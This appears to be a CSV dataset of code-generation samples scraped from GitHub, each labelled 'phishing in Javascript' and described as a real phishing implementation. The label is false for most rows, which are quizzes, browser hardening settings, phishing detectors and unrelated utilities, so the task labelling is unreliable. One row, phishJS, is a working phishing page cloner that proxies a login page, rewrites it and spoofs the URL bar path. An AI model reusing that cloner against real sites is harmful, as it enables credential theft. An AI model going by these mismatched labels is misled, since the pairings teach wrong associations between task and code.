task,problem_title,problem_description,sample_solution,language,repo_name,timestamp,split code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/* Author: Selvahini Kamalarajan Date: December 5, 2023 File Name: script Description: Informational website about the implications of privacy and information technology usage */ function phishing() { // Function to display correct answer for phishing email question var question = document.quiz2.question.value; if (question == ""yes"") { document.getElementById(""message"").innerHTML = ""Correct! This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate.""; } if (question == ""no"") { document.getElementById(""message"").innerHTML = ""Incorrect. This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate. Your privacy can be compromised due to malicious script activities.""; } document.getElementById(""after_submit"").style.visibility = ""visible""; //Set element visibility to visible } function check() { // Function to check answers for Privacy Policy Question var question = document.quiz.question.value; // Output message and picture if user answers yes/no if (question == ""yes"") { document.getElementById(""message"").innerHTML = ""Nice! You are one of 9% of people who read privacy policies often.""; document.getElementById(""picture"").src = ""policy.png""; } if (question == ""no"") { document.getElementById(""message"").innerHTML = ""Just like you, 91% of consumers accept the terms and conditions without reading them.""; document.getElementById(""picture"").src = ""policies-stats.jpg""; } document.getElementById(""after_submit"").style.visibility = ""visible""; } function checkAns() { // Function to check answers for quiz var correctAns = [""b"", ""b"", ""a"", ""d"", ""b"", ""d"", ""b"", ""b"", ""c"", ""d""]; var correct = 0; var questions = [document.quiz.q1.value, document.quiz.q2.value, document.quiz.q3.value, documen",Javascript,selvxhini-10/PersonalPrivacyWebsite,2025-05-22T22:01:00.115247,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"// /****************************************************************************** * user.js * * https://github.com/pyllyukko/user.js * ******************************************************************************/ /****************************************************************************** * SECTION: HTML5 / APIs / DOM * ******************************************************************************/ // PREF: Disable Service Workers // https://developer.mozilla.org/en-US/docs/Web/API/Worker // https://developer.mozilla.org/en-US/docs/Web/API/ServiceWorker_API // https://wiki.mozilla.org/Firefox/Push_Notifications#Service_Workers // NOTICE: Disabling ServiceWorkers breaks functionality on some sites (Google Street View...) // NOTICE: Disabling ServiceWorkers breaks Firefox Sync // Unknown security implications // CVE-2016-5259, CVE-2016-2812, CVE-2016-1949, CVE-2016-5287 (fixed) user_pref(""dom.serviceWorkers.enabled"", false); // PREF: Disable web notifications // https://support.mozilla.org/en-US/questions/1140439 user_pref(""dom.webnotifications.enabled"", false); // PREF: Disable DOM timing API // https://wiki.mozilla.org/Security/Reviews/Firefox/NavigationTimingAPI // https://www.w3.org/TR/navigation-timing/#privacy // NOTICE: Disabling DOM timing API breaks item pages in AliExpress (https://github.com/pyllyukko/user.js/issues/561) user_pref(""dom.enable_performance"", false); // PREF: Disable resource timing API // https://www.w3.org/TR/resource-timing/#privacy-security // NOTICE: Disabling resource timing API breaks some DDoS protection pages (Cloudflare) user_pref(""dom.enable_resource_timing"", false); // PREF: Make sure the User Timing API does not provide a new high resolution timestamp // https://trac.torproject.org/projects/tor/ticket/16336 // https://www.w3.org/TR/2013/REC-user-timing-2",Javascript,pyllyukko/user.js,2025-05-22T22:01:00.249678,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"export class PhishingDetector { constructor() { // No need to check for ai.languageModel here // We'll handle capability checks when we use the model } async calculateScore(emailContent) { try { // Log emailContent for debugging console.log('Email content received:', emailContent); const features = this.analyzeEmailFeatures(emailContent); // Check if the language model is available const capabilities = await ai.languageModel.capabilities(); if (capabilities.available !== ""readily"") { console.warn('Language model is not readily available'); if (capabilities.consent === ""granted"") { console.log('Consent already granted.'); } else if (capabilities.consent === ""requirable"") { // Request user consent const consentResult = await ai.languageModel.requestConsent(); if (!consentResult) { console.warn('User did not grant consent'); return 50; // Return a default score or handle accordingly } else { console.log('User granted consent.'); } } else { console.warn('Consent is not available.'); return 50; // Return a default score or handle accordingly } } // Generate the prompt const prompt = ` Instructions: - Considering the above information, assign a phishing likelihood score and provide a detailed explanation. - Use English and Arabic numerals. - Return the result in the format ""The score is the following: X"", where X is a number between 0 and 100. Analyze this email for phishing indicators and provide a response in the following format: The score is the following: X The explanation is: [Your detailed analysis here] End of explanation. Consider these factors: - Urgency or pressure tactics - Grammar and spelling errors - Suspicious links or attachments - Requests for sensitive information - Mismatched or fake sender addresses - Time sent ",Javascript,Dalosuuu/GmailPhishGuardian_AI,2025-05-22T22:01:00.434292,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"'use strict' const chromeLauncher = require('chrome-launcher') const path = require('path') // Borrow from here: // https://github.com/GoogleChrome/puppeteer/blob/master/lib/Launcher.js#L30 const DEFAULT_ARGS = [ '--disable-background-networking', '--disable-background-timer-throttling', '--disable-client-side-phishing-detection', '--disable-default-apps', '--disable-hang-monitor', '--disable-popup-blocking', '--disable-prompt-on-repost', '--disable-sync', '--enable-automation', '--enable-devtools-experiments', '--metrics-recording-only', '--no-first-run', '--password-store=basic', '--safebrowsing-disable-auto-update', '--use-mock-keychain', ] // borrow from: http://qiita.com/saekis/items/c2b41cd8940923863791 function escapeHtml (string) { if (typeof string !== 'string') { return string } return string.replace(/[&'`""<>]/g, function (match) { return { '&': '&', '\'': ''', '`': '`', '""': '"', '<': '<', '>': '>', }[match] }) } function escapeSingleQuote (string) { if (typeof string !== 'string') { return string } return string.replace(/'/g, '\\\'') } function escapeNewLine (string) { return string.replace(/\r?\n/g, '\\n') } async function createChromeLauncher (startingUrl, options) { const flags = [].concat(DEFAULT_ARGS) let chromeInstance // Lighthouse adds '--disable-setuid-sandbox' flag automatically. // The flag causes an error on linux when staring headless chrome. // '--no-sandbox' suppresses an error caused by '--disable-setuid-sandbox'. if (process.platform === 'linux') { flags.push('--no-sandbox') } if (!options.visible) { flags.push('--headless') flags.push('--hide-scrollbars') flags.push('--mute-audio') } if (options.chromeFlags && Array.isArray(options.chromeFlags)) { options.chromeFlags.forEach(f => { if (f.indexOf('--') === -1) { throw new Error('An item of chromFlags option",Javascript,OnetapInc/chromy,2025-05-22T22:01:00.573851,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"// eslint-disable-next-line no-undef docute.init({ debug: true, title: 'Spam Scanner', repo: 'spamscanner/spamscanner', 'edit-link': 'https://github.com/spamscanner/spamscanner/tree/master/', twitter: 'niftylettuce', nav: { default: [ { title: 'The best anti-spam, email filtering, and phishing prevention service.', path: '/' } ] }, // eslint-disable-next-line no-undef plugins: [docuteEmojify()] }); ",Javascript,spamscanner/spamscanner,2025-05-22T22:01:00.710474,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.," // this is the code which will be injected into a given page... var config = { apiKey: ""AIzaSyD1FfiwIWzbbn0rhqQg6ZF2KzVBOiqU7oQ"", authDomain: ""phish-ai-production.firebaseapp.com"", databaseURL: ""https://phish-ai-production.firebaseio.com"", projectId: ""phish-ai-production"", storageBucket: ""gs://phish-ai-production.appspot.com/"", messagingSenderId: ""976092427021"" }; firebase.initializeApp(config); var db = firebase.firestore(); function open_options_page() { chrome.tabs.create({'url': ""/options.html"" } ) }; function open_demo_page() { chrome.tabs.create({'url': ""https://www.phish.ai/request-a-demo"" } ) }; function restore_popup() { chrome.storage.local.get({ idnEnable: true, aiEnable: true }, function(items) { if (!items.aiEnable) { document.getElementById('zero_day_disabled').style.display = """" } if (!items.idnEnable) { document.getElementById('idn_disabled').style.display = """" } var bg = chrome.extension.getBackgroundPage(); var query = {active: true, currentWindow: true}; chrome.tabs.query(query, function callback(tabs) { if (items.idnEnable) { var currentTab = tabs[0]; // there will be only one in this array var hostname = bg.extractHostname(currentTab.url); var domain = document.getElementById('domain'); var idn_status = document.getElementById('idn_status'); if (bg.isDomainIDN(hostname)) { domain.className = 'badge badge-danger'; idn_status.className = 'badge badge-danger'; idn_status.innerHTML = 'IDN Detected'; } domain.innerHTML = hostname; } if (items.aiEnable) { if (currentTab.id in bg.tabMalicious) { var zero_day = document.getElementById('zero_day'); var ta",Javascript,phishai/phish-protect,2025-05-22T22:01:00.830022,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"respecConfig.localBiblio = { ""aicaptcha"": { ""title"": ""aiCaptcha: Using AI to beat CAPTCHA and post comment spam"", ""date"": """", ""authors"": [""Casey Chesnut""], ""editors"": [], ""etAl"": false, ""publisher"": """", ""href"": ""http://www.brains-n-brawn.com/default.aspx?vDir=aicaptcha"" }, ""able-gamers"": { ""title"": ""Thought On Accessibility and VR"", ""date"": ""March, 2017"", ""authors"": [""AJ Ryan""], ""editors"": [], ""etAl"": false, ""publisher"": """", ""href"": ""https://ablegamers.org/thoughts-on-accessibility-and-vr/"" }, ""antiphishing"": { ""title"": ""Phishing Activity Trends Report"", ""date"": ""July, 2005"", ""authors"": [], ""editors"": [], ""etAl"": false, ""publisher"": ""Anti-Phishing Working Group"", ""href"": ""http://antiphishing.org/APWG_Phishing_Activity_Report_Jul_05.pdf"" }, ""breaking"": { ""title"": ""Breaking CAPTCHAs Without Using OCR"", ""date"": """", ""authors"": [""Howard Yeend""], ""editors"": [], ""etAl"": false, ""publisher"": """", ""href"": ""http://www.cs.berkeley.edu/%7Emori/gimpy/gimpy.html"" }, ""breakingocr"": { ""title"": ""Breaking CAPTCHAs Without Using OCR"", ""date"": """", ""authors"": [""Howard Yeend""], ""editors"": [], ""etAl"": false, ""publisher"": """", ""href"": ""http://www.puremango.co.uk/cm_breaking_captcha_115.php"" }, ""chafee"": { ""title"": ""17 USC 121, Limitations on exclusive rights: reproduction for blind or other people with disabilities (also known as the Chafee Amendment)"", ""date"": """", ""authors"": [], ""editors"": [], ""etAl"": false, ""publisher"": """", ""href"": ""https://www.copyright.gov/title17/92chap1.html"" }, ""captcha-ocr"": { ""title"": ""CAPTCHA: Attacks and Weaknesses against OCR technology"", ""date"": ""2013"", ""authors"": [ ""Silky Azad"", ""Kiran Jain""], ""publisher"": ""Journal of Computer science and Technology"", ""etAl"": false, ""editors"": [], ""href"": ""https://computerresearch.org/index.php/computer/article/download/368/368"" }, ""information-security"": { ""ti",Javascript,w3c/apa,2025-05-22T22:01:01.006796,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"'use strict'; const fs = require('fs-extra'); const debug = require('debug')('app'); const express = require('express'); const csp = require('express-csp-header'); const frameguard = require('frameguard'); const xssFilter = require('x-xss-protection'); const bodyParser = require('body-parser'); const url = require('url'); const dateFormat = require('dateformat'); const {fork} = require('child_process'); const download = require('download-file'); const rimraf = require('rimraf'); const phishingDetector = require('eth-phishing-detect/src/detector'); const crypto = require(""crypto""); const request = require('request'); const app = express(); const config = require('./config'); const check = require('./_utils/webcheck.js'); const lookup = require('./_utils/lookup.js'); let default_template = fs.readFileSync('./_layouts/default.html', 'utf8'); let cache; let updating_now = false; let icon_warnings = []; var older_cache_time; if('perform_dns_lookup' in config && config.perform_dns_lookup === false) { default_template = default_template.replace(""{{ config.perform_dns_lookup }}"", ""
DNS lookups not performed due to configuration.

""); } else { default_template = default_template.replace(""{{ config.perform_dns_lookup }}"", ''); } /* See if there's an up-to-date cache, otherwise run `update.js` to create one. */ function getCache(callback = false) { if (!fs.existsSync('_cache/cache.json')) { debug(""No cache file found. Creating one...""); if (callback) { if (!updating_now) { updating_now = true; fork('update.js'); } var checkDone = setInterval(function() { if (fs.existsSync('_cache/cache.json')) { updating_now = false; cache = JSON.parse(fs.readFileSync('_cache/cache.json')); clearInterval(checkDone); debug(""Successfully updated cache!""); ",Javascript,MrLuit/EtherScamDB,2025-05-22T22:01:01.099275,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/** * Github * https://github.com/6IX7ine/certstreamcatcher * * Copyright (c) 2017 Fábio Castro * Licensed under the MIT license. */ 'use strict' const tld = require('tldjs'); const lodash = require('lodash'); const color = require('cli-color'); const status = require('node-status'); const punycode = require('punycode'); const yellow = color.yellow.underline; const danger = color.redBright.underline; const white = color.white.underline; const certificates = status.addItem('certificates'); const mapping = { ""a"": [""à"", ""á"", ""â"", ""ã"", ""ä"", ""å"", ""ā"", ""ă"", ""ą"", ""ǎ"", ""ȁ"", ""ȃ"", ""ȧ"", ""ḁ"", ""ẚ"", ""ạ""], ""b"": [""ḃ"", ""ḅ"", ""ḇ"", ""ƀ""], ""c"": [""ç"", ""ć"", ""ĉ"", ""ċ"", ""č""], ""d"": [""ḋ"", ""ḍ"", ""ḏ"", ""ḑ"", ""ḓ"", ""đ""], ""e"": [""è"", ""é"", ""ê"", ""ë"", ""ĕ"", ""ė"", ""ę"", ""ě"", ""ȅ"", ""ȇ"", ""ȩ"", ""ḙ"", ""ḛ"", ""ẹ"", ""ẽ""], ""f"": [""ḟ""], ""g"": [""ĝ"", ""ğ"", ""ġ"", ""ģ"", ""ǧ"", ""ǵ"", ""ḡ""], ""h"": [""ĥ"", ""ȟ"", ""ḣ"", ""ḥ"", ""ḧ"", ""ḩ"", ""ḫ"", ""ẖ""], ""i"": [""ì"", ""í"", ""î"", ""ï"", ""ĩ"", ""ī"", ""ĭ"", ""į"", ""ǐ"", ""ȉ"", ""ȋ"", ""ḭ"", ""ị""], ""j"": [""ĵ"", ""ǰ""], ""k"": [""ķ"", ""ǩ"", ""ḱ"", ""ḳ"", ""ḵ""], ""l"": [""ĺ"", ""ļ"", ""ľ"", ""ŀ"", ""ḷ"", ""ḻ"", ""ḽ"", ""ι"", ""ł""], ""m"": [""ḿ"", ""ṁ"", ""ṃ"", ""ϻ""], ""n"": [""ñ"", ""ń"", ""ņ"", ""ň"", ""ʼn"", ""ǹ"", ""ṅ"", ""ṇ"", ""ṉ"", ""ṋ""], ""o"": [""ò"", ""ó"", ""ô"", ""õ"", ""ö"", ""ō"", ""ŏ"", ""ő"", ""ơ"", ""ǒ"", ""ǫ"", ""ố"", ""ȍ"", ""ȏ"", ""ȯ"", ""ọ"", ""ø"", ""ộ""], ""p"": [""ṕ"", ""ṗ"", ""ϸ""], ""r"": [""ŕ"", ""ŗ"", ""ř"", ""ȑ"", ""ȓ"", ""ṙ"", ""ṛ"", ""ṟ"", ""ґ""], ""s"": [""ŝ"", ""ş"", ""š"", ""ș"", ""ṡ"", ""ṣ""], ""t"": [""ţ"", ""ť"", ""ț"", ""ṫ"", ""ṭ"", ""ṯ"", ""ṱ"", ""ẗ""], ""u"": [""ù"", ""ú"", ""û"", ""ü"", ""ũ"", ""ū"", ""ŭ"", ""ů"", ""ű"", ""ų"", ""ư"", ""ǔ"", ""ȕ"", ""ȗ"", ""ṳ"", ""ṵ"", ""ṷ"", ""ụ""], ""v"": [""ṽ"", ""ṿ""], ""w"": [""ŵ"", ""ẁ"", ""ẃ"", ""ẅ"", ""ẇ"", ""ẉ"", ""ẘ""], ""x"": [""ẋ"", ""ẍ""], ""y"": [""ý"", ""ÿ"", ""ŷ"", ""ȳ"", ""ẏ"", ""ẙ"", ""ỳ"", ""ỵ"", ""ỹ""], ""z"": [""ź"", ""ż"", ""ž"", ""ẑ"", ""ẓ"", ""ẕ""] } module.exports = { certstreamClientPhishing: function (certstream, regex, tlds, options) { this.certstream = certstream; this.regex = regex; this.tlds = tlds; let settings = { tlds: false }; if (!op",Javascript,jimywork/certstreamcatcher,2025-05-22T22:01:01.244357,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"// Redirecting to links from the book: // https://nooffice.link/REDIRECT // which translates to https://nooffice.org/redirect?to=REDIRECT let links = new Map([ //list of REDIRECT links ['nooffice', 'https://nooffice.org'], //chapter 19 ['ocr', 'https://en.wikipedia.org/wiki/Optical_character_recognition'], ['evernote','https://Evernote.com'], ['swiftscan', 'https://swiftscan.app/en/index.html'], ['ios-scan', 'https://support.apple.com/en-us/HT210336'], ['dropbox', 'https://www.dropbox.com'], ['box', 'https://box.com'], ['gdrive', 'https://drive.google.com'], ['onedrive', 'https://www.microsoft.com/en-us/microsoft-365/onedrive/online-cloud-storage'], ['iwork', 'https://www.apple.com/iwork/'], ['gsheets', 'https://www.google.com/sheets/about/'], ['excel', 'https://www.microsoft.com/en-us/microsoft-365/excel'], ['mfa', 'https://en.wikipedia.org/wiki/Multi-factor_authentication'], ['messages', 'https://support.apple.com/explore/messages'], ['signal', 'https://www.signal.org'], ['telegram', 'https://telegram.org'], ['whatsapp', 'https://www.whatsapp.com'], ['ipadonly', 'https://ipadonly.com/book/'], ['vpn', 'https://en.wikipedia.org/wiki/Virtual_private_network'], ['github', 'https://nooffice.org/why-in-any-company-you-should-be-using-version-control-for-anything-how-we-use-github-not-only-bc2554308455/'], //chapter 20 ['conversation', 'https://en.wikipedia.org/wiki/A_Little_Less_Conversation'], ['slack', 'https://slack.com'], ['msteams', 'https://www.microsoft.com/en-us/microsoft-365/microsoft-teams/group-chat-software'], ['cognitive', 'https://www.pnas.org/content/106/37/15583'], ['digital-minimalism', 'https://www.calnewport.com/books/digital-minimalism/'], //chapter 21 ['offices', 'https://sliwinski.com/tag/office'], ['cabinet', 'https://sliwinski.com/declutter-your-desk-why-i-love-my-clutter-fre/'], ['stand', 'https://michael.team/myoffice/'], ['whiteboard', 'https://sliwinski.com/whiteboard/'], //chapter 22 //chapter 23 ['basecamphires', 'https://m.signa",Javascript,Nozbe/NoOffice.org,2025-05-22T22:01:01.359520,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/* OpenID for node.js * * http://ox.no/software/node-openid * http://github.com/havard/node-openid * * Copyright (C) 2010 by Håvard Stranden * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the ""Software""), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * * -*- Mode: JS; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- * vim: set sw=2 ts=2 et tw=80 : */ const { access } = require('fs'); var Buffer = require('buffer').Buffer, crypto = require('crypto'), http = require('./http'), querystring = require('querystring'), url = require('url'), xrds = require('./lib/xrds'); var _associations = {}; var _discoveries = {}; var _nonces = {}; var AX_MAX_VALUES_COUNT = 1000; var openid = exports; var _get = http.get; var _post = http.post; function hasOwnProperty(obj, prop) { return Object.prototype.hasOwnProperty.call(obj, prop); } openid.RelyingParty = function (returnUrl, realm, stateless, strict, extensions) { this.returnUrl = returnUrl; this.realm = realm || null; this.stateless = stateless; this.str",Javascript,havard/node-openid,2025-05-22T22:01:01.483356,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"//If container already in DOM, remove it if(report.length > 0) report.remove(); //Container report /*report = $('
\ \
');*/ body.append('
'); report = cacheSel('#report'); //Container, select subject / textarea report.html('

Selectionner le sujet de votre signalement

\ \ '); //Refresh caching report = cacheSel('#report'); reportv = cacheSel('#reportv'); //Hide the reportv until a subject get select reportv.hide(); //Get 80% in px var sizecal = $(window).width() * 0.8; //Max width if(parseInt(sizecal) > 600) var sizecal = 600; //Pop the container vote report.dialog({ width:sizecal, modal:true, resizable: true, title:'Signalement', dialogClass:'modalNinja', show:{effect:'scale', duration: 320}, buttons: [{ text: 'Confirmation', click: function() { //Subject reps = reportv.attr('class'); //Value textarea rept = reportv.val(); //Less 10 chars return if(rept.length < 10) { coloredInput(reportv,'errorSe','Minimum 10 caractères'); return; ",Javascript,Anyon3/ninjacms,2025-05-22T22:01:01.680023,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/** * Created by IntelliJ IDEA. * User: Altryne * Date: Nov 20, 2010 * Time: 4:55:41 AM * To change this template use File | Settings | File Templates. */ var intervall = 0; can_run_apps = false, folder_open = false, tick = '', doubleclickthreshhold = 200, isDblClick = false, canScroll = true, active_app = ''; $('.page .delete,#dock .delete').live('click', function(event) { event.stopPropagation(); event.stopImmediatePropagation(); if(confirm('Are you sure you want to delete this app from you iPad?')){ $(this).parent().css({'width':74,'height':99}).children('.delete, span').hide(); $(this).siblings('.app_logo') .stop() .css('position','absolute') .animate({left:""50%"",width:1,top:""50%"",height: 1},'easeInQuint',function(){$(this).parent().remove()}) } }); $('#multitask_bar .delete').live('mousedown ', function(event) { event.stopPropagation(); event.stopImmediatePropagation(); $(this).parent().css({'width':74,'height':99}).children('.delete, span').hide(); $(this).siblings('.app_logo') .stop() .css('position','absolute') .animate({left:""50%"",width:1,top:""50%"",height: 1},'easeInQuint',function(){ _id = $(this).parent().attr('id'); $('#'+_id+'_app').remove(); $(this).parent().remove(); if(!$('#multitask_bar li').length){ closeMultitask(200); } }) }); $('.page.apps>li,#dock li').live('mousedown mouseup', function(event) { if (event.type == 'mousedown') { $(this).addClass('mousedown'); if (!$('#drag').is('.ui-draggable-dragging') && !$('body').is('.editMode')) { can_run_apps = true; intervall = setTimeout(edit_mode, '1000'); }else if($(this).hasClass('folder') && $('body').is('.editMode')){ openFolder($(this).attr('id",Javascript,altryne/Ipad-Simulator,2025-05-22T22:01:01.825080,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/* * Copyright (c) 2021, Atheropids. All rights reserved. * * THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ 'use strict'; const https = require('https'); const readline = require('readline'); const tough = require('tough-cookie'); // Spec holder class. Please see comments of member variables for details. class PhishingServer { constructor(__domain, __entry_path = '/', __login_page = '/home/login', __login_inbox = '/login/dologin') { // Target C&C server domain name. this.target_domain = __domain; // Remote path for server cookie init. this.entry_path = __entry_path; // Remote path of the phishing page. this.phishing_page_path = __login_page; // Remote path of the phishing data receiver. this.phishing_target_path = __login_inbox; } } /* * Settings are here c: * Modify them on your purpose. */ // List of malicious servers. let spam_targets = [ // [seized operation] new PhishingServer('steamcomrninuty.ru'), // [seized operation] new PhishingServer('steamcommnunmity.com', '/id/zxayonax'), // [seized operation] new PhishingServer('nitro-discord.ru', '/airdrop'), // [seized operation] new PhishingServer('steamcommunity.link'), // [seized operation] new PhishingServer('discorcl.link'), new PhishingServer('steamcommmunilty.com', '/tradoffer/new/?partner=406482431&token=lfk938iK'), new PhishingServer('discorrd.ru'), new PhishingServer('free-nitroos.ru'), new PhishingServer('discod.info', '/nitro-gift'), new PhishingServer('d",Javascript,Atheropids/SteamComrninuty-Phish-Spammer,2025-05-22T22:01:02.005822,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"module.exports = [ '2015', '2016', '2017', '2018', '2019', '2020', 'abuse', 'academy', 'accessibility', 'account', 'accountant', 'accounting', 'accountmanager', 'accountmanagers', 'accounts', 'accountspayable', 'acquisition', 'admin', 'admin1', 'administracao', 'administracion', 'administrador', 'administratie', 'administratif', 'administration', 'administrativo', 'administrator', 'administrators', 'admins', 'adminteam', 'admissions', 'adops', 'ads', 'adventure', 'advertise', 'advertising', 'advertisingsales', 'advice', 'advisor', 'advisors', 'adwords', 'affiliate', 'affiliates', 'agence', 'agencia', 'agency', 'agents', 'alarm', 'alarms', 'alert', 'alerts', 'alexa', 'all', 'all-employees', 'all-pms', 'all-staff', 'all-team', 'all-users', 'all.employees', 'all.staff', 'all.users', 'all_staff', 'alla', 'alle', 'allemployees', 'allhands', 'allsales', 'allstaff', 'allstudents', 'allteachers', 'allteam', 'allusers', 'alpha', 'alphas', 'alumni', 'ambassadors', 'amministrazione', 'analysts', 'analytics', 'android', 'angels', 'animation', 'announce', 'announcements', 'ap', 'api', 'app', 'apple', 'application', 'applications', 'apply', 'appointments', 'apps', 'archives', 'asistente', 'asset', 'assistanthead', 'assistencia', 'assistenza', 'associates', 'associates-all', 'ateam', 'atencionalcliente', 'atendimento', 'auctions', 'available', 'backend', 'backend-dev', 'backup', 'bd', 'benefits', 'berlin', 'bestellung', 'beta', 'biblioteca', 'bibliotheque', 'billing', 'bills', 'biuro', 'biz', 'bizdev', 'blog', 'board', 'bod', 'bookclub', 'booking', 'bookings', 'boston', 'boxoffice', 'brand', 'branding', 'brands', 'brandsolutions', 'broadcast', 'buchhaltung', 'bugs', 'build', 'bursar', 'busdev', 'business',",Javascript,decal/werdlists,2025-05-22T22:01:02.114023,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"page_src = ""https://login.vulnwebsite.com/""; phishing_url=""http://yourphishingdomain.com/""; function doHTMLMagic(pageSource, baseURL, phishDomain) { replaceSrc = pageSource.replace('href=""/', ""href=\"""" + baseURL+ '/'); replaceSrc = replaceSrc.replace('src=""/', ""src=\"""" + baseURL+ '/'); replaceSrc = replaceSrc.replace('', ''); return replaceSrc; } function createCORSRequest(method, url) { var xhr = new XMLHttpRequest(); if (""withCredentials"" in xhr) { xhr.open(method, url, true); } else if (typeof XDomainRequest != ""undefined"") { xhr = new XDomainRequest(); xhr.open(method, url); } else { xhr = null; } return xhr; } function makeCorsRequest(baseURL, phishDomain) { var url = 'https://cors-anywhere.herokuapp.com/' + baseURL; var xhr = createCORSRequest('GET', url); if (!xhr) { return; } xhr.onload = function() { var pageSourceStr = doHTMLMagic(xhr.responseText, baseURL, phishDomain) document.open(); document.write(pageSourceStr); document.close(); }; xhr.send(); } makeCorsRequest(page_src, phishing_url); window.history.pushState("""", ""Login"", ""/login"");",Javascript,infosec-au/phishJS,2025-05-22T22:01:02.254176,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const { Builder, By, until, Capabilities } = require(""selenium-webdriver"") const chrome = require(""selenium-webdriver/chrome"") const url = require(""url"") const fs = require(""fs"") const crypto = require(""crypto"") const request = require(""request"") const path = require(""path"") const FormData = require(""form-data"") const proxy = require(""selenium-webdriver/proxy"") const proxyChain = require(""proxy-chain"") require('console-stamp')(console, { format: ':date(yyyy/mm/dd HH:MM:ss.l)' }) require(""dotenv"").config() const extensionId = ""caacbgbklghmpodbdafajbgdnegacfmo"" const CRX_URL = `https://clients2.google.com/service/update2/crx?response=redirect&prodversion=98.0.4758.102&acceptformat=crx2,crx3&x=id%3D${extensionId}%26uc&nacl_arch=x86-64` const USER_AGENT = ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"" const USER = process.env.APP_USER || """" const PASSWORD = process.env.APP_PASS || """" const ALLOW_DEBUG = !!process.env.DEBUG?.length || false const EXTENSION_FILENAME = ""app.crx"" const PROXY = process.env.PROXY || undefined console.log(""-> Starting..."") console.log(""-> User:"", USER) console.log(""-> Pass:"", PASSWORD) console.log(""-> Proxy:"", PROXY) console.log(""-> Debug:"", ALLOW_DEBUG) if (!USER || !PASSWORD) { console.error(""Please set APP_USER and APP_PASS env variables"") process.exit() } if (ALLOW_DEBUG) { console.log( ""-> Debugging is enabled! This will generate a screenshot and console logs on error!"" ) } async function downloadExtension(extensionId) { const url = CRX_URL.replace(extensionId, extensionId) const headers = { ""User-Agent"": USER_AGENT } console.log(""-> Downloading extension from:"", url) // if file exists and modify time is less than 1 day, skip download if (fs.existsSync(EXTENSION_FILENAME) && fs.statSync(EXTENSION_FILENAME).mtime > Date.now() - 86400000) { console.log(""-> Extension already downloaded! skip download..."") return } return new ",Javascript,web3bothub/gradient-bot,2025-05-22T22:01:02.390815,training code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const SCALES = { URGENCY: 5, CONFRIM: 6 }; const TOTALSCALE = 20; const THRESH = 0.33; function emailCheck(email) { let scale = 0; let idx = email.lastIndexOf(""@""); id = email.slice(0, idx); dmn = email.slice(idx + 1); len1 = id.length; len2 = dmn.length; // Check Email ID for Number Count >= 3 idNums = id.replace(/\D/g, """"); if (idNums && idNums.length >= 3) scale += 2; // Check Email Domain for Number Count > 0 dmnNums = dmn.replace(/\D/g, """"); if (dmnNums && dmnNums.length > 0) scale += 2; // Check Email Domain for Common Domain let found = DOMAINS.find(d => d === dmn); if (!found) scale += 1; return scale; } function URLcheck(body) { url = body.match( /[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)/ ); if (url) return 2; return 0; } function greetingCheck(greeting) { let scale = 0; for (i = 0; i < 3; i++) { let found = GREETINGS.find(greet => greeting[i] === greet); if (found) scale += 1; if (scale > 1) return 2; } return scale; } function urgencyCheck(word) { let found = URGENCY_WORDS.find(w => w === word); if (found) return 5 / 3; return 0; } function confirmCheck(word) { let found = CONFIRMING_WORDS.find(w => w === word); if (found) return 2; return 0; } function dictionaryCheck(body) { body = 